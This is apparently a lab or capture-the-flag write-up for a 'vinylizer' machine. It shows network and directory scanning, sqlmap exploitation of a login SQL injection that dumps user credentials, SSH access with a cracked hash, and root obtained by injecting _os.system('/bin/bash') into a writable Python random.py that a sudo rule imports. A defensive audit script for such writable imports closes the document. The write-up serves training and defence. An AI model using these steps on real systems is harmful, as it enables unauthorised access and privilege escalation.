Kali: 192.168.56.104
Host discovery
arp-scan -l
# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:d2:e0:49, IPv4: 192.168.56.104
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:05 (Unknown: locally administered)
192.168.56.100 08:00:27:37:8d:16 PCS Systemtechnik GmbH
192.168.56.119 08:00:27:6d:ec:17 PCS Systemtechnik GmbH
Target: 192.168.56.119
Port scan
nmap 192.168.56.119
22/tcp open ssh
80/tcp open http
Directory scan
gobuster dir -u http://192.168.56.119 -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[22:26:45] 301 - 314B - /img -> http://192.168.56.119/img/
[22:26:50] 200 - 637B - /login.php
Testing the login page shows it is vulnerable to SQL injection.
Capture the login request and feed it to sqlmap.
sqlmap -l a.txt --batch --dbs
[*] information_schema
[*] performance_schema
[*] vinyl_marketplace
# sqlmap -l a.txt --batch -D vinyl_marketplace --tables
+-------+
| users |
+-------+
# sqlmap -l a.txt --batch -D vinyl_marketplace -T users --columns
+----------------+--------------+
| Column         | Type         |
+----------------+--------------+
| id             | int          |
| login_attempts | int          |
| password       | varchar(255) |
| username       | varchar(255) |
+----------------+--------------+
# sqlmap -l a.txt --batch -D vinyl_marketplace -T users --dump
+----+----------------------------------+-----------+----------------+
| id | password                         | username  | login_attempts |
+----+----------------------------------+-----------+----------------+
| 1  | 9432522ed1a8fca612b11c3980a031f6 | shopadmin | 0              |
| 2  | password123                      | lana      | 0              |
+----+----------------------------------+-----------+----------------+
Logging in as lana turns up nothing.
shopadmin's password hash, cracked as MD5, gives addicted2vinyl.
It does not work on the web login page, but it does work for SSH.
# ssh shopadmin@192.168.56.119
shopadmin@192.168.56.119's password:
...
shopadmin@vinylizer:~$
$ sudo -l
Matching Defaults entries for shopadmin on vinylizer:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User shopadmin may run the following commands on vinylizer:
(ALL : ALL) NOPASSWD: /usr/bin/python3 /opt/vinylizer.py
/opt/vinylizer.py runs as root,
but the file itself cannot be modified, so the only way in is through the modules it imports.
Opening it shows that it imports the json and random modules.
shopadmin@vinylizer:/opt$ find / -name json.py 2>/dev/null
/snap/lxd/24322/share/openvswitch/python/ovs/json.py
shopadmin@vinylizer:/opt$ ls -al /snap/lxd/24322/share/openvswitch/python/ovs/json.py
-rw-r--r-- 1 root root 16843 Jan 17 2023 /snap/lxd/24322/share/openvswitch/python/ovs/json.py
shopadmin@vinylizer:/opt$ find / -name random.py 2>/dev/null
/snap/core20/1974/usr/lib/python3.8/random.py
/usr/lib/python3.10/random.py
shopadmin@vinylizer:/opt$ ls -al /snap/core20/1974/usr/lib/python3.8/random.py
-rw-r--r-- 1 root root 28802 May 26 2023 /snap/core20/1974/usr/lib/python3.8/random.py
shopadmin@vinylizer:/opt$ ls -al /usr/lib/python3.10/random.py
-rwxrwxrwx 1 root root 33221 Nov 20 15:14 /usr/lib/python3.10/random.py
/usr/lib/python3.10/random.py is writable, and it is exactly the random module that gets imported:
>>> import random
>>> random
<module 'random' from '/usr/lib/python3.10/random.py'>
Modify this module:
below the import lines add
_os.system("/bin/bash")
then run the script and it is done
sudo /usr/bin/python3 /opt/vinylizer.py
shopadmin@vinylizer:~$ sudo /usr/bin/python3 /opt/vinylizer.py
root@vinylizer:/home/shopadmin# whoami
root
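As an added defender-side check, not part of the original write-up: a root-side audit that takes a script a sudoers rule allows, lists the modules it imports, resolves where the interpreter would load each one, and flags any module file, module directory, or the script's own directory (first on sys.path) that group or other users can modify. Function names such as audit_script are my own; paths and permissions are read from whatever host it runs on.

```python
"""Audit a script that sudoers lets a user run as root: list its imports, resolve
where the interpreter loads each one, and flag module files, their directories or
the script's own directory that group/other users can modify (cf. random.py above)."""
import ast
import importlib.util
import os
import stat
import sys

def imported_modules(source: str) -> set[str]:
    """Top-level names of every module the script source imports."""
    names: set[str] = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return names

def writable_by_non_owner(mode: int) -> bool:
    """True when the group or other write bit is set on a stat() mode."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def resolve_module_file(name: str):
    """File Python would import `name` from; None for built-in, frozen or missing."""
    try:
        spec = importlib.util.find_spec(name)
    except (ImportError, ValueError):
        return None
    if spec is None or spec.origin in (None, "built-in", "frozen"):
        return None
    return spec.origin

def audit_script(script_path: str) -> dict[str, str]:
    """Map each risky import (and '<script dir>') to the path a non-root user can edit."""
    with open(script_path, encoding="utf-8") as fh:
        source = fh.read()
    findings: dict[str, str] = {}
    script_dir = os.path.dirname(os.path.abspath(script_path))
    if writable_by_non_owner(os.stat(script_dir).st_mode):
        findings["<script dir>"] = script_dir  # sys.path[0]: a dropped file shadows stdlib
    for name in sorted(imported_modules(source)):
        origin = resolve_module_file(name)
        for path in ([origin, os.path.dirname(origin)] if origin else []):
            if writable_by_non_owner(os.stat(path).st_mode):
                findings[name] = path
                break
    return findings

if __name__ == "__main__":
    for target in sys.argv[1:] or ["/opt/vinylizer.py"]:
        for module, path in audit_script(target).items():
            print(f"{target}: import {module} -> {path} writable by non-owner")
```

Run it as root against each script named in a NOPASSWD interpreter rule; an empty result means every import resolves to a path only root can change.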